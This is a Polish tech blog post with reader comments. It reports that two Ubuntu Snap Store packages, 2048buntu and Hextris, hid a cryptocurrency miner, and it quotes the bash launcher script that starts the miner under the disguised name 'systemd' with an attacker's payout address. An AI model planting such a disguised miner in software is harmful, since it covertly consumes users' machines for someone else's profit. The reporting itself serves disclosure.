Syndrom sukcesu, czyli pierwsze malware w Ubuntu Snap Store
Ubuntu Snap Store odnotował właśnie pierwszy sukces w postaci nawiązania do osiągnięć wielkich konkurentów i ich sklepów z oprogramowaniem. Społeczność nie doceniła tego doniosłego faktu. Sprawa została zgłoszona jako błąd #651 a programy których dotyczyło zgłoszenie zostały usunięte. Użytkowniku Ubuntu – zacznij się oswajać z trwogą przed malware.
Jak można przeczytać w doniesieniu #651, użytkownicy odkryli że co najmniej dwa programy oferowane w ramach sklepu z paczkami Snap zawierają malware. Chodzi o 2048buntu oraz Hextris, które opublikował w Ubuntu Snaps Store „zaradny” Nicolas Tomb. Programy zawierały skrypty uruchamiające na komputera nieświadomych użytkowników kopalnię bitcoinów.
Wartym odnotowania jest również fakt, że większości swoich snapów Nicolas określił jako oprogramowanie własnościowe, za pomocą stosownej licencji. Najwidoczniej autor nie czuje się związany ze społecznością i nie zamierza dzielić z nią ani swoich kodów źródłowych ani zapewne przyszłych dochodów wypracowanych przez jego skrypty.
Wgląd w dodatki instalowane przez te paczki nie pozostawia złudzeń:
#!/bin/bash
currency=bcn
name=2048buntu
{ # try
/snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 1 -g
} || { # catch
cores=($(grep -c ^processor /proc/cpuinfo))
if (( $cores < 4 )); then
/snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 1
else
/snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 2
fi
}
Jak do tego doszło? Cóż, nieustanne zarzuty wobec ludzi odpowiedzialnych za sklep Ubuntu doprowadziły do tego, że uproszczono zasadę publikowania paczek Snap. Nie ma tu takiego sita jak w przypadku paczek .deb które trafiają do oficjalnego repozytorium. Pojawienie się malware (i w przyszłości zapewne innych) to była kwestia czasu.
Obydwie paczki (jak i inne osiągnięcia Nicolasa) zostały już usunięte z Ubuntu Snap Store. Przypuszczalnie jednak mogą krążyć jeszcze gdzieś po internecie (Google Cache? Github?).
Czy stoimy właśnie u progu nowej linuksowej jakości?
13 komentarzy
Dodaj komentarz
Witryna wykorzystuje Akismet, aby ograniczyć spam. Dowiedz się więcej jak przetwarzane są dane komentarzy.
Znalazłem literówkę w 3 wierszu tekstu:
“Użytkowników Ubuntu” zamiast Użytkowniku Ubuntu…
Jeśli Ubuntu miałoby zastąpić Windowsy, to jego twórcy dobrze kombinują 😉
A tak poważnie, to od początku uważałem,że te całe snapy i temu podobne wynalazki to poroniony pomysł.
Nie wiem jak można używać ubuntu. Po tych historiach z amazonem itp dotyczących prywatności to już lepiej mieć windowsa chociaż można pograć jak człowiek, a chcesz linuxa to zainstaluj Debiana lub coś opartego o Red Hat.
Hmmm… prostacka gierka, która ma 138 Mb zamkniętego kodu z zależnościami… śmierdzi na odległość.
A nie jest tak z każdym snapem?
Google cache? Github? Facebook? Biedronka? Skrzynka pocztowa? Wycieraczka?
Kpina?Sarkazm?Dowcip?Kompleks?Złośliwość?Bezradność?
Śmiech śmiechem, ale nie wiadomo do czego doklika się zawzięty użytkownik na:
https://webcache.googleusercontent.com/search?source=hp&ei=BDT3WvTIKaGr6AT295HIDw&q=cache%3Ahttps%3A%2F%2Fsnapcraft.io%2F2048buntu&oq=cache%3Ahttps%3A%2F%2Fsnapcraft.io%2F2048buntu&gs_l=psy-ab.3…5653.7198.0.7376.7.7.0.0.0.0.125.686.4j3.7.0….0…1c.1.64.psy-ab..0.6.614…0j46j0i46k1.0.OioghBze15M
Nie jesteś śmieszny.
Plus jest taki, że nawet jak ktoś upchnie malware lub inne „coś” w snapie, to i tak działa sobie w swojej piaskownicy. Problemem jednak może być pasożytowanie na zasobach komputera.
A miał być?
Z całym szacunkiem, ale takie bicie piany jest naprawdę zbędne. Nie dokilka się niczego, bo tak czy siak musiałby używać snapa (jako polecenie!) lokalnie. Zbędne sianie FUD-u.
Psułeś pakiety w Archu, że musiałem przenieść się na Funtoo.
Arch stał się dystrybucją dla gimbazy, aby przechwalać się, że mają najnowsze jądro z całym tym syfem systemd, pulseaudio.